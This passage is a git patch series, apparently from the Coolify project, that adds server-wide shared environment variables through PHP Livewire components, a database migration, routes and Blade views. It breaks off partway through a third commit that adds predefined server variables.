From e8d985211e19b881abe721d54a2d6df8e23b961a Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Wed, 24 Dec 2025 11:30:16 +0100
Subject: [PATCH 001/213] feat: shared server environment variables

---
 app/Jobs/ApplicationDeploymentJob.php         |  24 +--
 app/Livewire/SharedVariables/Server/Index.php |  22 +++
 app/Livewire/SharedVariables/Server/Show.php  | 169 ++++++++++++++++++
 app/Models/EnvironmentVariable.php            |  65 ++++++-
 app/Models/Server.php                         |   5 +
 app/Models/SharedEnvironmentVariable.php      |   5 +
 app/View/Components/Forms/EnvVarInput.php     |   4 +
 bootstrap/helpers/constants.php               |   2 +-
 ..._to_shared_environment_variables_table.php |  35 ++++
 .../livewire/shared-variables/index.blade.php |  48 ++---
 .../shared-variables/server/index.blade.php   |  25 +++
 .../shared-variables/server/show.blade.php    |  36 ++++
 routes/web.php                                |   4 +
 13 files changed, 411 insertions(+), 33 deletions(-)
 create mode 100644 app/Livewire/SharedVariables/Server/Index.php
 create mode 100644 app/Livewire/SharedVariables/Server/Show.php
 create mode 100644 database/migrations/2025_12_24_095507_add_server_to_shared_environment_variables_table.php
 create mode 100644 resources/views/livewire/shared-variables/server/index.blade.php
 create mode 100644 resources/views/livewire/shared-variables/server/show.blade.php

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index 56a29276b..b37eb9833 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -1234,7 +1234,7 @@ private function generate_runtime_environment_variables()
             });
 
             foreach ($runtime_environment_variables as $env) {
-                $envs->push($env->key.'='.$env->real_value);
+                $envs->push($env->key.'='.$env->getResolvedValueWithServer($this->server));
             }
 
             // Check for PORT environment variable mismatch with ports_exposes
@@ -1300,7 +1300,7 @@ private function generate_runtime_environment_variables()
             });
 
             foreach ($runtime_environment_variables_preview as $env) {
-                $envs->push($env->key.'='.$env->real_value);
+                $envs->push($env->key.'='.$env->getResolvedValueWithServer($this->server));
             }
             // Add PORT if not exists, use the first port as default
             if ($this->build_pack !== 'dockercompose') {
@@ -2304,14 +2304,16 @@ private function generate_nixpacks_env_variables()
         $this->env_nixpacks_args = collect([]);
         if ($this->pull_request_id === 0) {
             foreach ($this->application->nixpacks_environment_variables as $env) {
-                if (! is_null($env->real_value) && $env->real_value !== '') {
-                    $this->env_nixpacks_args->push("--env {$env->key}={$env->real_value}");
+                $resolvedValue = $env->getResolvedValueWithServer($this->server);
+                if (! is_null($resolvedValue) && $resolvedValue !== '') {
+                    $this->env_nixpacks_args->push("--env {$env->key}={$resolvedValue}");
                 }
             }
         } else {
             foreach ($this->application->nixpacks_environment_variables_preview as $env) {
-                if (! is_null($env->real_value) && $env->real_value !== '') {
-                    $this->env_nixpacks_args->push("--env {$env->key}={$env->real_value}");
+                $resolvedValue = $env->getResolvedValueWithServer($this->server);
+                if (! is_null($resolvedValue) && $resolvedValue !== '') {
+                    $this->env_nixpacks_args->push("--env {$env->key}={$resolvedValue}");
                 }
             }
         }
@@ -2447,8 +2449,9 @@ private function generate_env_variables()
                 ->get();
 
             foreach ($envs as $env) {
-                if (! is_null($env->real_value)) {
-                    $this->env_args->put($env->key, $env->real_value);
+                $resolvedValue = $env->getResolvedValueWithServer($this->server);
+                if (! is_null($resolvedValue)) {
+                    $this->env_args->put($env->key, $resolvedValue);
                 }
             }
         } else {
@@ -2458,8 +2461,9 @@ private function generate_env_variables()
                 ->get();
 
             foreach ($envs as $env) {
-                if (! is_null($env->real_value)) {
-                    $this->env_args->put($env->key, $env->real_value);
+                $resolvedValue = $env->getResolvedValueWithServer($this->server);
+                if (! is_null($resolvedValue)) {
+                    $this->env_args->put($env->key, $resolvedValue);
                 }
             }
         }
diff --git a/app/Livewire/SharedVariables/Server/Index.php b/app/Livewire/SharedVariables/Server/Index.php
new file mode 100644
index 000000000..cd10e510a
--- /dev/null
+++ b/app/Livewire/SharedVariables/Server/Index.php
@@ -0,0 +1,22 @@
+<?php
+
+namespace App\Livewire\SharedVariables\Server;
+
+use App\Models\Server;
+use Illuminate\Support\Collection;
+use Livewire\Component;
+
+class Index extends Component
+{
+    public Collection $servers;
+
+    public function mount()
+    {
+        $this->servers = Server::ownedByCurrentTeamCached();
+    }
+
+    public function render()
+    {
+        return view('livewire.shared-variables.server.index');
+    }
+}
diff --git a/app/Livewire/SharedVariables/Server/Show.php b/app/Livewire/SharedVariables/Server/Show.php
new file mode 100644
index 000000000..6aa34f242
--- /dev/null
+++ b/app/Livewire/SharedVariables/Server/Show.php
@@ -0,0 +1,169 @@
+<?php
+
+namespace App\Livewire\SharedVariables\Server;
+
+use App\Models\Server;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Illuminate\Support\Facades\DB;
+use Livewire\Component;
+
+class Show extends Component
+{
+    use AuthorizesRequests;
+
+    public Server $server;
+
+    public string $view = 'normal';
+
+    public ?string $variables = null;
+
+    protected $listeners = ['refreshEnvs' => 'refreshEnvs', 'saveKey' => 'saveKey', 'environmentVariableDeleted' => 'refreshEnvs'];
+
+    public function saveKey($data)
+    {
+        try {
+            $this->authorize('update', $this->server);
+
+            $found = $this->server->environment_variables()->where('key', $data['key'])->first();
+            if ($found) {
+                throw new \Exception('Variable already exists.');
+            }
+            $this->server->environment_variables()->create([
+                'key' => $data['key'],
+                'value' => $data['value'],
+                'is_multiline' => $data['is_multiline'],
+                'is_literal' => $data['is_literal'],
+                'type' => 'server',
+                'team_id' => currentTeam()->id,
+            ]);
+            $this->server->refresh();
+            $this->getDevView();
+        } catch (\Throwable $e) {
+            return handleError($e, $this);
+        }
+    }
+
+    public function mount()
+    {
+        $serverUuid = request()->route('server_uuid');
+        $teamId = currentTeam()->id;
+        $server = Server::where('team_id', $teamId)->where('uuid', $serverUuid)->first();
+        if (!$server) {
+            return redirect()->route('dashboard');
+        }
+        $this->server = $server;
+        $this->getDevView();
+    }
+
+    public function switch()
+    {
+        $this->authorize('view', $this->server);
+        $this->view = $this->view === 'normal' ? 'dev' : 'normal';
+        $this->getDevView();
+    }
+
+    public function getDevView()
+    {
+        $this->variables = $this->formatEnvironmentVariables($this->server->environment_variables->sortBy('key'));
+    }
+
+    private function formatEnvironmentVariables($variables)
+    {
+        return $variables->map(function ($item) {
+            if ($item->is_shown_once) {
+                return "$item->key=(Locked Secret, delete and add again to change)";
+            }
+            if ($item->is_multiline) {
+                return "$item->key=(Multiline environment variable, edit in normal view)";
+            }
+
+            return "$item->key=$item->value";
+        })->join("\n");
+    }
+
+    public function submit()
+    {
+        try {
+            $this->authorize('update', $this->server);
+            $this->handleBulkSubmit();
+            $this->getDevView();
+        } catch (\Throwable $e) {
+            return handleError($e, $this);
+        } finally {
+            $this->refreshEnvs();
+        }
+    }
+
+    private function handleBulkSubmit()
+    {
+        $variables = parseEnvFormatToArray($this->variables);
+
+        $changesMade = DB::transaction(function () use ($variables) {
+            // Delete removed variables
+            $deletedCount = $this->deleteRemovedVariables($variables);
+
+            // Update or create variables
+            $updatedCount = $this->updateOrCreateVariables($variables);
+
+            return $deletedCount > 0 || $updatedCount > 0;
+        });
+
+        if ($changesMade) {
+            $this->dispatch('success', 'Environment variables updated.');
+        }
+    }
+
+    private function deleteRemovedVariables($variables)
+    {
+        $variablesToDelete = $this->server->environment_variables()->whereNotIn('key', array_keys($variables))->get();
+
+        if ($variablesToDelete->isEmpty()) {
+            return 0;
+        }
+
+        $this->server->environment_variables()->whereNotIn('key', array_keys($variables))->delete();
+
+        return $variablesToDelete->count();
+    }
+
+    private function updateOrCreateVariables($variables)
+    {
+        $count = 0;
+        foreach ($variables as $key => $value) {
+            $found = $this->server->environment_variables()->where('key', $key)->first();
+
+            if ($found) {
+                if (! $found->is_shown_once && ! $found->is_multiline) {
+                    if ($found->value !== $value) {
+                        $found->value = $value;
+                        $found->save();
+                        $count++;
+                    }
+                }
+            } else {
+                $this->server->environment_variables()->create([
+                    'key' => $key,
+                    'value' => $value,
+                    'is_multiline' => false,
+                    'is_literal' => false,
+                    'type' => 'server',
+                    'team_id' => currentTeam()->id,
+                ]);
+                $count++;
+            }
+        }
+
+        return $count;
+    }
+
+    public function refreshEnvs()
+    {
+        $this->server->refresh();
+        $this->getDevView();
+    }
+
+    public function render()
+    {
+        return view('livewire.shared-variables.server.show');
+    }
+}
\ No newline at end of file
diff --git a/app/Models/EnvironmentVariable.php b/app/Models/EnvironmentVariable.php
index 895dc1c43..9308b9ce6 100644
--- a/app/Models/EnvironmentVariable.php
+++ b/app/Models/EnvironmentVariable.php
@@ -122,6 +122,17 @@ public function realValue(): Attribute
                     return null;
                 }
 
+                // Load relationships needed for shared variable resolution
+                if (! $resource->relationLoaded('environment')) {
+                    $resource->load('environment');
+                }
+                if (! $resource->relationLoaded('server') && method_exists($resource, 'server')) {
+                    $resource->load('server');
+                }
+                if (! $resource->relationLoaded('destination') && method_exists($resource, 'destination')) {
+                    $resource->load('destination.server');
+                }
+
                 $real_value = $this->get_real_environment_variables($this->value, $resource);
                 if ($this->is_literal || $this->is_multiline) {
                     $real_value = '\''.$real_value.'\'';
@@ -181,7 +192,43 @@ protected function isShared(): Attribute
         );
     }
 
-    private function get_real_environment_variables(?string $environment_variable = null, $resource = null)
+    public function get_real_environment_variables_with_server(?string $environment_variable = null, $resource = null, $server = null)
+    {
+        return $this->get_real_environment_variables_internal($environment_variable, $resource, $server);
+    }
+
+    public function getResolvedValueWithServer($server = null)
+    {
+        if (! $this->relationLoaded('resourceable')) {
+            $this->load('resourceable');
+        }
+        $resource = $this->resourceable;
+        if (! $resource) {
+            return null;
+        }
+
+        // Load relationships needed for shared variable resolution
+        if (! $resource->relationLoaded('environment')) {
+            $resource->load('environment');
+        }
+        if (! $resource->relationLoaded('server') && method_exists($resource, 'server')) {
+            $resource->load('server');
+        }
+        if (! $resource->relationLoaded('destination') && method_exists($resource, 'destination')) {
+            $resource->load('destination.server');
+        }
+
+        $real_value = $this->get_real_environment_variables_internal($this->value, $resource, $server);
+        if ($this->is_literal || $this->is_multiline) {
+            $real_value = '\''.$real_value.'\'';
+        } else {
+            $real_value = escapeEnvVariables($real_value);
+        }
+
+        return $real_value;
+    }
+
+    private function get_real_environment_variables_internal(?string $environment_variable = null, $resource = null, $serverOverride = null)
     {
         if ((is_null($environment_variable) && $environment_variable === '') || is_null($resource)) {
             return null;
@@ -203,6 +250,17 @@ private function get_real_environment_variables(?string $environment_variable =
                 $id = $resource->environment->project->id;
             } elseif ($type->value() === 'team') {
                 $id = $resource->team()->id;
+            } elseif ($type->value() === 'server') {
+                // Use server override if provided (for deployment context), otherwise use resource's server
+                if ($serverOverride) {
+                    $id = $serverOverride->id;
+                } elseif (isset($resource->server) && $resource->server) {
+                    $id = $resource->server->id;
+                } elseif (isset($resource->destination) && $resource->destination && isset($resource->destination->server)) {
+                    $id = $resource->destination->server->id;
+                } else {
+                    $id = null;
+                }
             }
             if (is_null($id)) {
                 continue;
@@ -216,6 +274,11 @@ private function get_real_environment_variables(?string $environment_variable =
         return str($environment_variable)->value();
     }
 
+    private function get_real_environment_variables(?string $environment_variable = null, $resource = null)
+    {
+        return $this->get_real_environment_variables_internal($environment_variable, $resource);
+    }
+
     private function get_environment_variables(?string $environment_variable = null): ?string
     {
         if (! $environment_variable) {
diff --git a/app/Models/Server.php b/app/Models/Server.php
index be39e3f8d..31d4f6440 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -1016,6 +1016,11 @@ public function team()
         return $this->belongsTo(Team::class);
     }
 
+    public function environment_variables()
+    {
+        return $this->hasMany(SharedEnvironmentVariable::class)->where('type', 'server');
+    }
+
     public function isProxyShouldRun()
     {
         // TODO: Do we need "|| $this->proxy->force_stop" here?
diff --git a/app/Models/SharedEnvironmentVariable.php b/app/Models/SharedEnvironmentVariable.php
index 7956f006a..7b68bbac9 100644
--- a/app/Models/SharedEnvironmentVariable.php
+++ b/app/Models/SharedEnvironmentVariable.php
@@ -27,4 +27,9 @@ public function environment()
     {
         return $this->belongsTo(Environment::class);
     }
+
+    public function server()
+    {
+        return $this->belongsTo(Server::class);
+    }
 }
diff --git a/app/View/Components/Forms/EnvVarInput.php b/app/View/Components/Forms/EnvVarInput.php
index 4a98e4a51..faef64a36 100644
--- a/app/View/Components/Forms/EnvVarInput.php
+++ b/app/View/Components/Forms/EnvVarInput.php
@@ -38,6 +38,7 @@ public function __construct(
         public array $availableVars = [],
         public ?string $projectUuid = null,
         public ?string $environmentUuid = null,
+        public ?string $serverUuid = null,
     ) {
         // Handle authorization-based disabling
         if ($this->canGate && $this->canResource && $this->autoDisable) {
@@ -86,6 +87,9 @@ public function render(): View|Closure|string
                     'environment_uuid' => $this->environmentUuid,
                 ])
                 : route('shared-variables.environment.index'),
+            'server' => $this->serverUuid
+                ? route('shared-variables.server.show', ['server_uuid' => $this->serverUuid])
+                : route('shared-variables.server.index'),
             'default' => route('shared-variables.index'),
         ];
 
diff --git a/bootstrap/helpers/constants.php b/bootstrap/helpers/constants.php
index bbbe2bc05..9c103aaac 100644
--- a/bootstrap/helpers/constants.php
+++ b/bootstrap/helpers/constants.php
@@ -81,4 +81,4 @@
 const NEEDS_TO_DISABLE_STRIPPREFIX = [
     'appwrite' => ['appwrite', 'appwrite-console', 'appwrite-realtime'],
 ];
-const SHARED_VARIABLE_TYPES = ['team', 'project', 'environment'];
+const SHARED_VARIABLE_TYPES = ['team', 'project', 'environment', 'server'];
diff --git a/database/migrations/2025_12_24_095507_add_server_to_shared_environment_variables_table.php b/database/migrations/2025_12_24_095507_add_server_to_shared_environment_variables_table.php
new file mode 100644
index 000000000..0207ed955
--- /dev/null
+++ b/database/migrations/2025_12_24_095507_add_server_to_shared_environment_variables_table.php
@@ -0,0 +1,35 @@
+<?php
+
+use Illuminate\Database\Migrations\Migration;
+use Illuminate\Database\Schema\Blueprint;
+use Illuminate\Support\Facades\DB;
+use Illuminate\Support\Facades\Schema;
+
+return new class extends Migration {
+    /**
+     * Run the migrations.
+     */
+    public function up(): void
+    {
+        DB::statement("ALTER TABLE shared_environment_variables DROP CONSTRAINT shared_environment_variables_type_check");
+        DB::statement("ALTER TABLE shared_environment_variables ADD CONSTRAINT shared_environment_variables_type_check CHECK (type IN ('team', 'project', 'environment', 'server'))");
+        Schema::table('shared_environment_variables', function (Blueprint $table) {
+            $table->foreignId('server_id')->nullable()->constrained()->onDelete('cascade');
+            $table->unique(['key', 'server_id', 'team_id']);
+        });
+    }
+
+    /**
+     * Reverse the migrations.
+     */
+    public function down(): void
+    {
+        Schema::table('shared_environment_variables', function (Blueprint $table) {
+            $table->dropUnique(['key', 'server_id', 'team_id']);
+            $table->dropForeign(['server_id']);
+            $table->dropColumn('server_id');
+        });
+        DB::statement("ALTER TABLE shared_environment_variables DROP CONSTRAINT shared_environment_variables_type_check");
+        DB::statement("ALTER TABLE shared_environment_variables ADD CONSTRAINT shared_environment_variables_type_check CHECK (type IN ('team', 'project', 'environment'))");
+    }
+};
diff --git a/resources/views/livewire/shared-variables/index.blade.php b/resources/views/livewire/shared-variables/index.blade.php
index 3e19e5f1a..5064b75ba 100644
--- a/resources/views/livewire/shared-variables/index.blade.php
+++ b/resources/views/livewire/shared-variables/index.blade.php
@@ -5,27 +5,33 @@
     <div class="flex items-start gap-2">
         <h1>Shared Variables</h1>
     </div>
-    <div class="subtitle">Set Team / Project / Environment wide variables.</div>
+     <div class="subtitle">Set Team / Project / Environment / Server wide variables.</div>
 
-    <div class="flex flex-col gap-2 -mt-1">
-        <a class="coolbox group" href="{{ route('shared-variables.team.index') }}" {{ wireNavigate() }}>
-            <div class="flex flex-col justify-center mx-6">
-                <div class="box-title">Team wide</div>
-                <div class="box-description">Usable for all resources in a team.</div>
-            </div>
-        </a>
-        <a class="coolbox group" href="{{ route('shared-variables.project.index') }}" {{ wireNavigate() }}>
-            <div class="flex flex-col justify-center mx-6">
-                <div class="box-title">Project wide</div>
-                <div class="box-description">Usable for all resources in a project.</div>
-            </div>
-        </a>
-        <a class="coolbox group" href="{{ route('shared-variables.environment.index') }}" {{ wireNavigate() }}>
-            <div class="flex flex-col justify-center mx-6">
-                <div class="box-title">Environment wide</div>
-                <div class="box-description">Usable for all resources in an environment.</div>
-            </div>
-        </a>
+     <div class="flex flex-col gap-2 -mt-1">
+         <a class="coolbox group" href="{{ route('shared-variables.team.index') }}" {{ wireNavigate() }}>
+             <div class="flex flex-col justify-center mx-6">
+                 <div class="box-title">Team wide</div>
+                 <div class="box-description">Usable for all resources in a team.</div>
+             </div>
+         </a>
+         <a class="coolbox group" href="{{ route('shared-variables.project.index') }}" {{ wireNavigate() }}>
+             <div class="flex flex-col justify-center mx-6">
+                 <div class="box-title">Project wide</div>
+                 <div class="box-description">Usable for all resources in a project.</div>
+             </div>
+         </a>
+         <a class="coolbox group" href="{{ route('shared-variables.environment.index') }}" {{ wireNavigate() }}>
+             <div class="flex flex-col justify-center mx-6">
+                 <div class="box-title">Environment wide</div>
+                 <div class="box-description">Usable for all resources in an environment.</div>
+             </div>
+         </a>
+         <a class="coolbox group" href="{{ route('shared-variables.server.index') }}" {{ wireNavigate() }}>
+             <div class="flex flex-col justify-center mx-6">
+                 <div class="box-title">Server wide</div>
+                 <div class="box-description">Usable for all resources in a server.</div>
+             </div>
+         </a>
 
-    </div>
+     </div>
 </div>
diff --git a/resources/views/livewire/shared-variables/server/index.blade.php b/resources/views/livewire/shared-variables/server/index.blade.php
new file mode 100644
index 000000000..4183fee5b
--- /dev/null
+++ b/resources/views/livewire/shared-variables/server/index.blade.php
@@ -0,0 +1,25 @@
+<div>
+    <x-slot:title>
+        Server Variables | Coolify
+    </x-slot>
+    <div class="flex gap-2">
+        <h1>Servers</h1>
+    </div>
+    <div class="subtitle">List of your servers.</div>
+    <div class="flex flex-col gap-2">
+        @forelse ($servers as $server)
+            <a class="coolbox group"
+                href="{{ route('shared-variables.server.show', ['server_uuid' => data_get($server, 'uuid')]) }}" {{ wireNavigate() }}>
+                <div class="flex flex-col justify-center mx-6 ">
+                    <div class="box-title">{{ $server->name }}</div>
+                    <div class="box-description ">
+                        {{ $server->description }}</div>
+                </div>
+            </a>
+        @empty
+            <div>
+                <div>No server found.</div>
+            </div>
+        @endforelse
+    </div>
+</div>
\ No newline at end of file
diff --git a/resources/views/livewire/shared-variables/server/show.blade.php b/resources/views/livewire/shared-variables/server/show.blade.php
new file mode 100644
index 000000000..44ceeae7f
--- /dev/null
+++ b/resources/views/livewire/shared-variables/server/show.blade.php
@@ -0,0 +1,36 @@
+<div>
+    <x-slot:title>
+        Server Variable | Coolify
+    </x-slot>
+    <div class="flex gap-2 items-center">
+        <h1>Shared Variables for {{ data_get($server, 'name') }}</h1>
+        @can('update', $server)
+            <x-modal-input buttonTitle="+ Add" title="New Shared Variable">
+                <livewire:project.shared.environment-variable.add :shared="true" />
+            </x-modal-input>
+        @endcan
+        <x-forms.button canGate="update" :canResource="$server" wire:click='switch'>{{ $view === 'normal' ? 'Developer view' : 'Normal view' }}</x-forms.button>
+    </div>
+    <div class="flex flex-wrap gap-1 subtitle">
+        <div>You can use these variables anywhere with</div>
+        <div class="dark:text-warning text-coollabs">@{{ server.VARIABLENAME }} </div>
+        <x-helper
+            helper="More info <a class='underline dark:text-white' href='https://coolify.io/docs/knowledge-base/environment-variables#shared-variables' target='_blank'>here</a>."></x-helper>
+    </div>
+    @if ($view === 'normal')
+        <div class="flex flex-col gap-2">
+            @forelse ($server->environment_variables->sort()->sortBy('key') as $env)
+                <livewire:project.shared.environment-variable.show wire:key="environment-{{ $env->id }}"
+                    :env="$env" type="server" />
+            @empty
+                <div>No environment variables found.</div>
+            @endforelse
+        </div>
+    @else
+        <form wire:submit='submit' class="flex flex-col gap-2">
+            <x-forms.textarea canGate="update" :canResource="$server" rows="20" class="whitespace-pre-wrap" id="variables" wire:model="variables"
+                label="Server Shared Variables"></x-forms.textarea>
+            <x-forms.button canGate="update" :canResource="$server" type="submit" class="btn btn-primary">Save All Environment Variables</x-forms.button>
+        </form>
+    @endif
+</div>
\ No newline at end of file
diff --git a/routes/web.php b/routes/web.php
index 2a9072299..c2c9293fd 100644
--- a/routes/web.php
+++ b/routes/web.php
@@ -70,6 +70,8 @@
 use App\Livewire\SharedVariables\Index as SharedVariablesIndex;
 use App\Livewire\SharedVariables\Project\Index as ProjectSharedVariablesIndex;
 use App\Livewire\SharedVariables\Project\Show as ProjectSharedVariablesShow;
+use App\Livewire\SharedVariables\Server\Index as ServerSharedVariablesIndex;
+use App\Livewire\SharedVariables\Server\Show as ServerSharedVariablesShow;
 use App\Livewire\SharedVariables\Team\Index as TeamSharedVariablesIndex;
 use App\Livewire\Source\Github\Change as GitHubChange;
 use App\Livewire\Storage\Index as StorageIndex;
@@ -145,6 +147,8 @@
         Route::get('/project/{project_uuid}', ProjectSharedVariablesShow::class)->name('shared-variables.project.show');
         Route::get('/environments', EnvironmentSharedVariablesIndex::class)->name('shared-variables.environment.index');
         Route::get('/environments/project/{project_uuid}/environment/{environment_uuid}', EnvironmentSharedVariablesShow::class)->name('shared-variables.environment.show');
+        Route::get('/servers', ServerSharedVariablesIndex::class)->name('shared-variables.server.index');
+        Route::get('/server/{server_uuid}', ServerSharedVariablesShow::class)->name('shared-variables.server.show');
     });
 
     Route::prefix('team')->group(function () {

From 81009c29cf58b024605bc75d6163af9964f5e5dd Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Wed, 24 Dec 2025 13:31:40 +0100
Subject: [PATCH 002/213] fix: server env shows not found on application
 variables input field on autocomplete

---
 .../Shared/EnvironmentVariable/Add.php        | 41 +++++++++++++++++++
 .../Shared/EnvironmentVariable/Show.php       | 41 +++++++++++++++++++
 .../components/forms/env-var-input.blade.php  |  2 +-
 .../shared/environment-variable/add.blade.php |  3 +-
 .../environment-variable/show.blade.php       |  9 ++--
 5 files changed, 91 insertions(+), 5 deletions(-)

diff --git a/app/Livewire/Project/Shared/EnvironmentVariable/Add.php b/app/Livewire/Project/Shared/EnvironmentVariable/Add.php
index fa65e8bd2..f1b92c5db 100644
--- a/app/Livewire/Project/Shared/EnvironmentVariable/Add.php
+++ b/app/Livewire/Project/Shared/EnvironmentVariable/Add.php
@@ -67,6 +67,7 @@ public function availableSharedVariables(): array
             'team' => [],
             'project' => [],
             'environment' => [],
+            'server' => [],
         ];
 
         // Early return if no team
@@ -122,6 +123,46 @@ public function availableSharedVariables(): array
             }
         }
 
+        // Get server variables
+        $serverUuid = data_get($this->parameters, 'server_uuid');
+        if ($serverUuid) {
+            // If we have a specific server_uuid, show variables for that server
+            $server = \App\Models\Server::where('team_id', $team->id)
+                ->where('uuid', $serverUuid)
+                ->first();
+
+            if ($server) {
+                try {
+                    $this->authorize('view', $server);
+                    $result['server'] = $server->environment_variables()
+                        ->pluck('key')
+                        ->toArray();
+                } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+                    // User not authorized to view server variables
+                }
+            }
+        } else {
+            // For application environment variables, try to use the application's destination server
+            $applicationUuid = data_get($this->parameters, 'application_uuid');
+            if ($applicationUuid) {
+                $application = \App\Models\Application::whereRelation('environment.project.team', 'id', $team->id)
+                    ->where('uuid', $applicationUuid)
+                    ->with('destination.server')
+                    ->first();
+
+                if ($application && $application->destination && $application->destination->server) {
+                    try {
+                        $this->authorize('view', $application->destination->server);
+                        $result['server'] = $application->destination->server->environment_variables()
+                            ->pluck('key')
+                            ->toArray();
+                    } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+                        // User not authorized to view server variables
+                    }
+                }
+            }
+        }
+
         return $result;
     }
 
diff --git a/app/Livewire/Project/Shared/EnvironmentVariable/Show.php b/app/Livewire/Project/Shared/EnvironmentVariable/Show.php
index 2030f631e..a14adb83f 100644
--- a/app/Livewire/Project/Shared/EnvironmentVariable/Show.php
+++ b/app/Livewire/Project/Shared/EnvironmentVariable/Show.php
@@ -204,6 +204,7 @@ public function availableSharedVariables(): array
             'team' => [],
             'project' => [],
             'environment' => [],
+            'server' => [],
         ];
 
         // Early return if no team
@@ -259,6 +260,46 @@ public function availableSharedVariables(): array
             }
         }
 
+        // Get server variables
+        $serverUuid = data_get($this->parameters, 'server_uuid');
+        if ($serverUuid) {
+            // If we have a specific server_uuid, show variables for that server
+            $server = \App\Models\Server::where('team_id', $team->id)
+                ->where('uuid', $serverUuid)
+                ->first();
+
+            if ($server) {
+                try {
+                    $this->authorize('view', $server);
+                    $result['server'] = $server->environment_variables()
+                        ->pluck('key')
+                        ->toArray();
+                } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+                    // User not authorized to view server variables
+                }
+            }
+        } else {
+            // For application environment variables, try to use the application's destination server
+            $applicationUuid = data_get($this->parameters, 'application_uuid');
+            if ($applicationUuid) {
+                $application = \App\Models\Application::whereRelation('environment.project.team', 'id', $team->id)
+                    ->where('uuid', $applicationUuid)
+                    ->with('destination.server')
+                    ->first();
+
+                if ($application && $application->destination && $application->destination->server) {
+                    try {
+                        $this->authorize('view', $application->destination->server);
+                        $result['server'] = $application->destination->server->environment_variables()
+                            ->pluck('key')
+                            ->toArray();
+                    } catch (\Illuminate\Auth\Access\AuthorizationException $e) {
+                        // User not authorized to view server variables
+                    }
+                }
+            }
+        }
+
         return $result;
     }
 
diff --git a/resources/views/components/forms/env-var-input.blade.php b/resources/views/components/forms/env-var-input.blade.php
index 2466a57f9..dde535f19 100644
--- a/resources/views/components/forms/env-var-input.blade.php
+++ b/resources/views/components/forms/env-var-input.blade.php
@@ -17,7 +17,7 @@
             selectedIndex: 0,
             cursorPosition: 0,
             currentScope: null,
-            availableScopes: ['team', 'project', 'environment'],
+            availableScopes: ['team', 'project', 'environment', 'server'],
             availableVars: @js($availableVars),
             scopeUrls: @js($scopeUrls),
 
diff --git a/resources/views/livewire/project/shared/environment-variable/add.blade.php b/resources/views/livewire/project/shared/environment-variable/add.blade.php
index 9bc4f06a3..daf808c5e 100644
--- a/resources/views/livewire/project/shared/environment-variable/add.blade.php
+++ b/resources/views/livewire/project/shared/environment-variable/add.blade.php
@@ -6,7 +6,8 @@
         <x-forms.env-var-input placeholder="production" id="value" label="Value" required
             :availableVars="$shared ? [] : $this->availableSharedVariables"
             :projectUuid="data_get($parameters, 'project_uuid')"
-            :environmentUuid="data_get($parameters, 'environment_uuid')" />
+            :environmentUuid="data_get($parameters, 'environment_uuid')"
+            :serverUuid="data_get($parameters, 'server_uuid')" />
     @endif
 
     @if (!$shared && !$is_multiline)
diff --git a/resources/views/livewire/project/shared/environment-variable/show.blade.php b/resources/views/livewire/project/shared/environment-variable/show.blade.php
index 68e1d7e7d..d2195c2af 100644
--- a/resources/views/livewire/project/shared/environment-variable/show.blade.php
+++ b/resources/views/livewire/project/shared/environment-variable/show.blade.php
@@ -111,7 +111,8 @@
                             id="value"
                             :availableVars="$this->availableSharedVariables"
                             :projectUuid="data_get($parameters, 'project_uuid')"
-                            :environmentUuid="data_get($parameters, 'environment_uuid')" />
+                            :environmentUuid="data_get($parameters, 'environment_uuid')"
+                            :serverUuid="data_get($parameters, 'server_uuid')" />
                         @if ($is_shared)
                             <x-forms.input disabled type="password" id="real_value" />
                         @endif
@@ -129,7 +130,8 @@
                                 id="value"
                                 :availableVars="$this->availableSharedVariables"
                                 :projectUuid="data_get($parameters, 'project_uuid')"
-                                :environmentUuid="data_get($parameters, 'environment_uuid')" />
+                                :environmentUuid="data_get($parameters, 'environment_uuid')"
+                                :serverUuid="data_get($parameters, 'server_uuid')" />
                         @endif
                         @if ($is_shared)
                             <x-forms.input :disabled="$is_redis_credential" :required="$is_redis_credential" disabled type="password" id="real_value" />
@@ -145,7 +147,8 @@
                         id="value"
                         :availableVars="$this->availableSharedVariables"
                         :projectUuid="data_get($parameters, 'project_uuid')"
-                        :environmentUuid="data_get($parameters, 'environment_uuid')" />
+                        :environmentUuid="data_get($parameters, 'environment_uuid')"
+                        :serverUuid="data_get($parameters, 'server_uuid')" />
                     @if ($is_shared)
                         <x-forms.input disabled type="password" id="real_value" />
                     @endif

From 5ed308dcf01dba904c4a131cbcc8ac92c2b7a9d2 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Wed, 24 Dec 2025 13:58:50 +0100
Subject: [PATCH 003/213] feat: predefined server variables
 (COOLIFY_SERVER_NAME, COOLIFY_SERVER_UUID)

These are not visible on shared env page but user can use these variables like they use the COOLIFY_RESOURCE_UUID
---
 app/Livewire/SharedVariables/Server/Show.php  | 20 +++++++++++++---
 app/Models/Environment.php                    |  2 +-
 app/Models/Project.php                        |  2 +-
 app/Models/Server.php                         | 19 ++++++++++++++-
 app/Models/Team.php                           |  2 +-
 .../SharedEnvironmentVariableSeeder.php       | 23 +++++++++++++++++++
 .../shared-variables/server/show.blade.php    |  2 +-
 7 files changed, 62 insertions(+), 8 deletions(-)

diff --git a/app/Livewire/SharedVariables/Server/Show.php b/app/Livewire/SharedVariables/Server/Show.php
index 6aa34f242..1dd9f9d46 100644
--- a/app/Livewire/SharedVariables/Server/Show.php
+++ b/app/Livewire/SharedVariables/Server/Show.php
@@ -24,6 +24,10 @@ public function saveKey($data)
         try {
             $this->authorize('update', $this->server);
 
+            if (in_array($data['key'], ['COOLIFY_SERVER_UUID', 'COOLIFY_SERVER_NAME'])) {
+                throw new \Exception('Cannot create predefined variable.');
+            }
+
             $found = $this->server->environment_variables()->where('key', $data['key'])->first();
             if ($found) {
                 throw new \Exception('Variable already exists.');
@@ -64,7 +68,7 @@ public function switch()
 
     public function getDevView()
     {
